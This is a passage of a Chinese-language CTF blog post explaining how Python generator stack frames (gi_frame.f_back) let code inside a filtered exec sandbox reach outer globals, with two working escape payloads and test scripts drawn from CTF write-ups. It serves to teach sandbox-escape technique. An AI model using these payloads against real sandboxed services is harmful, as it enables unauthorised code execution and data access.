<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># True
# True
# Result: 15
</span></pre></td></tr></tbody></table></code></div></div>

<h3 id="生成器的栈帧"><span class="me-2">生成器的栈帧</span><a href="#生成器的栈帧" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>每次调用一个普通函数时，Python 会为该函数创建一个新的栈帧，并将其压入调用栈中。当函数执行完毕后，栈帧会被弹出。生成器的实现也使用到了栈帧，但不同的是，生成器可以暂停执行，并在恢复时继续从暂停的位置执行，也就意味着生成器的栈帧行为有所区别。</p>

<p>下面是一个测试示例：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>

<span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Generator started, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">1</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After first yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">2</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After second yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">3</span>

<span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>

<span class="c1"># 第一次调用 next()，启动生成器
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
# 第二次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
# 第三次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span>
<span class="c1"># Generator started, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 4, code my_generator&gt;
# 1
# After first yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 6, code my_generator&gt;
# 2
# After second yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 8, code my_generator&gt;
# 3
</span></pre></td></tr></tbody></table></code></div></div>
<p>每次调用 next() 时，生成器会从上次暂停的位置继续执行，并且它的栈帧保持不变。这表明，在整个生命周期中，生成器的栈帧一直存在，并且保存着它的状态。</p>

<p>我们可以使用 dir 函数来查看生成器的内容</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="n">g</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">])</span>
<span class="nf">dir</span><span class="p">(</span><span class="n">g</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__del__',
#  '__delattr__',
#  ... ,
#  'close',
#  'gi_code',
#  'gi_frame',
#  'gi_running',
#  'gi_suspended',
#  'gi_yieldfrom',
#  'send',
#  'throw']
</span><span class="n">g</span><span class="p">.</span><span class="n">gi_frame</span>  <span class="c1"># &lt;frame at 0x102bd4880, file '/code.py', line 1, code &lt;genexpr&gt;&gt;
</span></pre></td></tr></tbody></table></code></div></div>
<p>生成器对象自身也存在一些独有的属性，以 gi_开头:</p>
<ul>
  <li>gi_frame: gi_frame 就是生成器的栈帧，生成器每次执行，栈帧的地址保持不变。</li>
</ul>

<h3 id="生成器栈帧逃逸-payload"><span class="me-2">生成器栈帧逃逸 payload</span><a href="#生成器栈帧逃逸-payload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>下面是博客 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的一段抽象逻辑：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;&lt;用户提供的 Python 代码&gt;&gt;</span><span class="sh">"""</span>
<span class="p">...</span> <span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">)</span>
<span class="p">...</span> <span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<p>用户的代码被丢进exec中执行。经过严格的过滤后，import、魔术方法、builtins 等沙箱逃逸的常用思路都会被堵死。这时候想要逃逸到 exec 环境之外拿到flag，甚至是 RCE，就需要通过栈帧回溯来实现。</p>

<h4 id="payload1"><span class="me-2">payload1</span><a href="#payload1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>文章 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的 payload 如下：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="p">[</span><span class="o">*</span><span class="n">q</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># g 现在是 exec 之外的栈帧的 globals 了
# g 是一个 dict，其中包含 flag 变量
</span></pre></td></tr></tbody></table></code></div></div>
<p>要理解上面的表达式，需要明白：</p>
<ol>
  <li>==生成器在初始化时并不会立即执行==。q 初始化之后并不会立即执行，而是到 [*q] 时才执行。因此乍一眼看有语法问题，q 并没有定义啊？但是当其执行时，q 已经是一个生成器对象了。</li>
  <li>f_back 属性用于访问调用栈中的前一个栈帧。</li>
</ol>

<p>因此：</p>
<ul>
  <li>q.gi_frame 是生成器对象 q 的当前栈帧。</li>
  <li>q.gi_frame.f_back 得到的是 exec 函数的栈帧，</li>
  <li>q.gi_frame.f_back.f_back 得到的就是全局栈帧了。</li>
  <li>q.gi_frame.f_back.f_back.f_globals 得到的就是 globals() 函数的内容。</li>
</ul>

<p>builtins 和 locals 也可以同理拿到。</p>

<p>作者提到为什么非得把 q.gi_frame 写在生成器里面？为什么不能写成下面这样：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span>
</pre></td></tr></tbody></table></code></div></div>

<p>原因在于只有在生成器运行过程中，q.gi_frame.f_back 才不为 None（CPython 中定义的逻辑）。即使 q 已经是一个生成器，但是由于并没有进行解包操作，生成器并没有运行，所以 q.gi_frame.f_back 始终为 None，如果没有解包的话，即使像上面那样写，结果也是 None。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span>
<span class="c1"># None
</span></pre></td></tr></tbody></table></code></div></div>

<p>测试脚本：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">q = (q.gi_frame.f_back.f_back.f_globals for _ in [1]);g = [*q][0];print(g)</span><span class="sh">"""</span>
<span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h4 id="payload2"><span class="me-2">payload2</span><a href="#payload2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p><a href="https://maplebacon.org/2024/02/dicectf2024-irs/">[DiceCTF 2024] IRS</a> 这篇博客也给出了一个生成器栈帧的 payload：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">f</span><span class="p">():</span>
    <span class="k">global</span> <span class="n">x</span><span class="p">,</span> <span class="n">frame</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span>
    <span class="k">yield</span>
<span class="n">x</span> <span class="o">=</span> <span class="nf">f</span><span class="p">()</span>
<span class="n">x</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="bp">None</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">frame</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>
<p>如何理解这段代码：</p>
<ol>
  <li>首先声明了一个生成器 f，
    <ol>
      <li>f 内部声明了全局变量 x 和 frame，意味着会在函数外部对其进行操作。</li>
    </ol>
  </li>
  <li>x = f() 会实例化一个生成器，但由于生成器的延迟加载，此时生成器不会执行。</li>
  <li>x.send(None)：这行代码启动了生成器，并让它执行到第一个 yield 语句。</li>
</ol>

<p>ps: 文章作者这段 payload 与上面那种 payload 的区别再于没有显示定一个生成器，AST 中不会出现 ast.GeneratorExp。</p>

<p>测试代码如下：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">'''</span><span class="s">
def f():
    global x, frame
    frame = x.gi_frame.f_back.f_back
    yield
x = f()
x.send(None)
print(frame.f_globals)
</span><span class="sh">'''</span>

<span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="csicn-2024-mossfern"><span class="me-2">CSICN 2024 mossfern</span><a href="#csicn-2024-mossfern" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h2 id="参考资料"><span class="me-2">参考资料</span><a href="#参考资料" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<ul>
  <li>
    <div class="table-wrapper"><table>
      <tbody>
        <tr>
          <td>[利用生成器栈帧逃逸 Pyjail</td>
          <td>CISCN 2024 mossfern 题解](https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern)</td>
        </tr>
      </tbody>
    </table></div>
  </li>
</ul>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/python/">Python</a>
      </div>
    
    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/pyjail/"
            class="post-tag no-text-decoration"
          >pyjail</a>
        
      </div>
    
    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
      <a href="https://twitter.com/intent/tweet?text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    
      <a href="https://www.facebook.com/sharer/sharer.php?title=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&u=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    
      <a href="https://t.me/share/url?url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F&text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    
    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->

  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        <li class="text-truncate lh-lg">
          <a href="/posts/phpggc-thinkphp-%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/">phpggc thinkphp 利用链分析</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8/">php 反序列化利用</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%A0%BC%E5%BC%8F%E5%9F%BA%E7%A1%80/">php 反序列化格式基础</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87/">php 反序列化绕过</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/">php 反序列化字符逃逸</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->

              <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

            </div>

  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->

<!-- An random integer that bigger than 0 -->

<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->

  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/QWB-2023-writeup/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1702981788"
  data-df="ll"
  
>
  Dec 19, 2023
</time>

              <h4 class="pt-0 my-2">QWB 2023 Writeup</h4>
              <div class="text-muted">
                <p>WEB
happygame
题目提供了一个 gRPC 服务。gRPC 是一个由 Google 初始开发的高性能、开源的远程过程调用（RPC）框架。网上已有不少针对 gRPC 的安全研究：

  【Black Hat Asia 2021系列分享】自动化挖掘 gRPC 网络接口漏洞
  gRPC内存马研究与查杀 - 先知社区

gRPC 框架如下所示：

可见服务端由 Java 编写。

针...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-04-%E7%BB%95%E8%BF%87%E5%A4%9A%E8%A1%8C%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-04 绕过多行限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过多行限制
绕过多行限制的利用手法通常在限制了单行代...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-03-%E7%BB%95%E8%BF%87%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-03 绕过命名空间限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过命名空间限制

部分限制
有些沙箱在构建时使用 e...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->

              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
    <a
      href="/posts/pyjail-bypass-10-%E7%BB%95%E8%BF%87-opcode-%E6%B2%99%E7%AE%B1/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>pyjail bypass-10 绕过 opcode 沙箱</p>
    </a>
  
    <a
      href="/posts/TPCTF-2025-web-writeup/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>TPCTF 2025 Web Writeup</p>
    </a>
  
</nav>

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

      <a href="https://twitter.com/DummyKitty">DummyKitty</a>.
    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    <!-- Embedded scripts -->

      <!-- The comments switcher -->

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->

<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
